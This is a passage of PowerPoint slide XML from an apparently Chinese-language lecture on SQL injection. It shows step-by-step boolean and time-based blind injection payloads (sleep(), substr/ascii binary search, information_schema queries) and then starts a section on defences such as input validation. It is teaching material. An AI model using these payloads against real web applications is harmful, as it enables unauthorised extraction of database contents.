              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>= ’users’ limit 0,1),1))=7 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示存在</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说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表的第一个字段为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>个字符长度。</a:t>
            </a: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采用二分法，即可猜解出所有字段名。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2432931" y="5488533"/>
            <a:ext cx="8352928" cy="1308884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第五步：猜解表中数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>继续用二分法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" kern="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966479" y="837929"/>
            <a:ext cx="2925802" cy="474140"/>
            <a:chOff x="4966479" y="837929"/>
            <a:chExt cx="2925802"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966479" y="837929"/>
              <a:ext cx="292580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基于时间的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SQL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盲注</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956767" y="1528093"/>
            <a:ext cx="11161240" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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也可以使用基于时间的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>盲注</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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首先判断是否存在注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，注入是字符型还是数字型：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’and sleep(5) #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，感觉到明显延迟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1 and sleep(500) #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，没有延迟</a:t>
            </a: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    说明存在字符型的基于时间的盲注。</a:t>
            </a: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猜解当前数据库名字长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">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if(length(database())=1,sleep(5),1) #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>没有延迟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">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if(length(database())=4,sleep(5),1) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>明显延迟</a:t>
            </a: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b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>采用二分法猜解数据库名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’ and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(database(),1,1))&gt;97,sleep(5),1)# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>明显延迟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>以此类推，猜解表、字段和数据</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88815" y="2896245"/>
            <a:ext cx="10441160" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <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SQL</a:t>
            </a:r>
            <a:r>
              <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注入的防御措施</a:t>
            </a:r>
            <a:endPar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101551" y="1667891"/>
            <a:ext cx="10657184" cy="702773"/>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由于越来越多的攻击利用了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注入技术，也随之产生了很多试图解决注入漏洞的方案。目前被提出的方案有</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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="808013"/>
            <a:ext cx="2231857" cy="508862"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="2231857" cy="508862"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="20000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Round Same Side Corner Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2568651" y="828281"/>
              <a:ext cx="508861" cy="165776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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2053958" y="1402731"/>
              <a:ext cx="1598005"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防御措施</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23" name="insert-table_64301"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="746845" y="858132"/>
            <a:ext cx="378654" cy="379982"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2764 w 5941"/>
              <a:gd name="T1" fmla="*/ 0 h 5971"/>
              <a:gd name="T2" fmla="*/ 2560 w 5941"/>
              <a:gd name="T3" fmla="*/ 1500 h 5971"/>
              <a:gd name="T4" fmla="*/ 0 w 5941"/>
              <a:gd name="T5" fmla="*/ 1735 h 5971"/>
              <a:gd name="T6" fmla="*/ 234 w 5941"/>
              <a:gd name="T7" fmla="*/ 5971 h 5971"/>
              <a:gd name="T8" fmla="*/ 4471 w 5941"/>
              <a:gd name="T9" fmla="*/ 5736 h 5971"/>
              <a:gd name="T10" fmla="*/ 5737 w 5941"/>
              <a:gd name="T11" fmla="*/ 3269 h 5971"/>
              <a:gd name="T12" fmla="*/ 5941 w 5941"/>
              <a:gd name="T13" fmla="*/ 203 h 5971"/>
              <a:gd name="T14" fmla="*/ 2967 w 5941"/>
              <a:gd name="T15" fmla="*/ 408 h 5971"/>
              <a:gd name="T16" fmla="*/ 4036 w 5941"/>
              <a:gd name="T17" fmla="*/ 956 h 5971"/>
              <a:gd name="T18" fmla="*/ 2967 w 5941"/>
              <a:gd name="T19" fmla="*/ 408 h 5971"/>
              <a:gd name="T20" fmla="*/ 4036 w 5941"/>
              <a:gd name="T21" fmla="*/ 1359 h 5971"/>
              <a:gd name="T22" fmla="*/ 2967 w 5941"/>
              <a:gd name="T23" fmla="*/ 1907 h 5971"/>
              <a:gd name="T24" fmla="*/ 2967 w 5941"/>
              <a:gd name="T25" fmla="*/ 2314 h 5971"/>
              <a:gd name="T26" fmla="*/ 4036 w 5941"/>
              <a:gd name="T27" fmla="*/ 2862 h 5971"/>
              <a:gd name="T28" fmla="*/ 2967 w 5941"/>
              <a:gd name="T29" fmla="*/ 2314 h 5971"/>
              <a:gd name="T30" fmla="*/ 469 w 5941"/>
              <a:gd name="T31" fmla="*/ 5502 h 5971"/>
              <a:gd name="T32" fmla="*/ 2560 w 5941"/>
              <a:gd name="T33" fmla="*/ 1969 h 5971"/>
              <a:gd name="T34" fmla="*/ 1912 w 5941"/>
              <a:gd name="T35" fmla="*/ 3654 h 5971"/>
              <a:gd name="T36" fmla="*/ 1563 w 5941"/>
              <a:gd name="T37" fmla="*/ 3376 h 5971"/>
              <a:gd name="T38" fmla="*/ 1152 w 5941"/>
              <a:gd name="T39" fmla="*/ 4717 h 5971"/>
              <a:gd name="T40" fmla="*/ 1249 w 5941"/>
              <a:gd name="T41" fmla="*/ 4843 h 5971"/>
              <a:gd name="T42" fmla="*/ 2544 w 5941"/>
              <a:gd name="T43" fmla="*/ 4499 h 5971"/>
              <a:gd name="T44" fmla="*/ 2589 w 5941"/>
              <a:gd name="T45" fmla="*/ 4332 h 5971"/>
              <a:gd name="T46" fmla="*/ 3148 w 5941"/>
              <a:gd name="T47" fmla="*/ 3269 h 5971"/>
              <a:gd name="T48" fmla="*/ 4002 w 5941"/>
              <a:gd name="T49" fmla="*/ 5502 h 5971"/>
              <a:gd name="T50" fmla="*/ 4465 w 5941"/>
              <a:gd name="T51" fmla="*/ 2862 h 5971"/>
              <a:gd name="T52" fmla="*/ 5534 w 5941"/>
              <a:gd name="T53" fmla="*/ 2314 h 5971"/>
              <a:gd name="T54" fmla="*/ 5534 w 5941"/>
              <a:gd name="T55" fmla="*/ 1907 h 5971"/>
              <a:gd name="T56" fmla="*/ 4465 w 5941"/>
              <a:gd name="T57" fmla="*/ 1359 h 5971"/>
              <a:gd name="T58" fmla="*/ 5534 w 5941"/>
              <a:gd name="T59" fmla="*/ 1907 h 5971"/>
              <a:gd name="T60" fmla="*/ 4465 w 5941"/>
              <a:gd name="T61" fmla="*/ 956 h 5971"/>
              <a:gd name="T62" fmla="*/ 5534 w 5941"/>
              <a:gd name="T63" fmla="*/ 408 h 5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41" h="5971">
                <a:moveTo>
                  <a:pt x="5737" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2764" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2652" y="0"/>
                  <a:pt x="2560" y="91"/>
                  <a:pt x="2560" y="203"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2560" y="1500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234" y="1500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="1500"/>
                  <a:pt x="0" y="1605"/>
                  <a:pt x="0" y="1735"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="5736"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="5866"/>
                  <a:pt x="105" y="5971"/>
                  <a:pt x="234" y="5971"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4236" y="5971"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4366" y="5971"/>
                  <a:pt x="4471" y="5866"/>
                  <a:pt x="4471" y="5736"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4471" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5737" y="3269"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5849" y="3269"/>
                  <a:pt x="5941" y="3177"/>
                  <a:pt x="5941" y="3065"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5941" y="203"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5941" y="91"/>
                  <a:pt x="5849" y="0"/>
                  <a:pt x="5737" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="408"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="408"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="1359"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="1359"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="2314"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="2314"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4002" y="5502"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="469" y="5502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469" y="1969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2560" y="1969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2560" y="3006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1912" y="3654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1660" y="3402"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1634" y="3377"/>
                  <a:pt x="1597" y="3367"/>
                  <a:pt x="1563" y="3376"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1528" y="3385"/>
                  <a:pt x="1501" y="3412"/>
                  <a:pt x="1492" y="3447"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1152" y="4717"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1143" y="4751"/>
                  <a:pt x="1152" y="4788"/>
                  <a:pt x="1178" y="4813"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1197" y="4833"/>
                  <a:pt x="1222" y="4843"/>
                  <a:pt x="1249" y="4843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1257" y="4843"/>
                  <a:pt x="1266" y="4842"/>
                  <a:pt x="1275" y="4839"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2544" y="4499"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2579" y="4490"/>
                  <a:pt x="2606" y="4463"/>
                  <a:pt x="2615" y="4428"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2624" y="4394"/>
                  <a:pt x="2614" y="4357"/>
                  <a:pt x="2589" y="4332"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2337" y="4079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3148" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4002" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4002" y="5502"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="2862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="2862"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="1907"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="1907"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="956"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="956"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="组合 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3732961" y="2716969"/>
            <a:ext cx="7024254" cy="830997"/>
            <a:chOff x="3746790" y="2250170"/>
            <a:chExt cx="7024254" cy="830997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="文本框 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="2250170"/>
              <a:ext cx="52220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在服务端正式处理之前对提交数据的合法性进行检查</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9" name="直接连接符 28"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="266626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3746790" y="2254880"/>
              <a:ext cx="954108" cy="822761"/>
              <a:chOff x="2357449" y="2676317"/>
              <a:chExt cx="954108" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="六边形 26"/>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2674273" y="2887049"/>
                <a:ext cx="338555" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyP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grpSp>
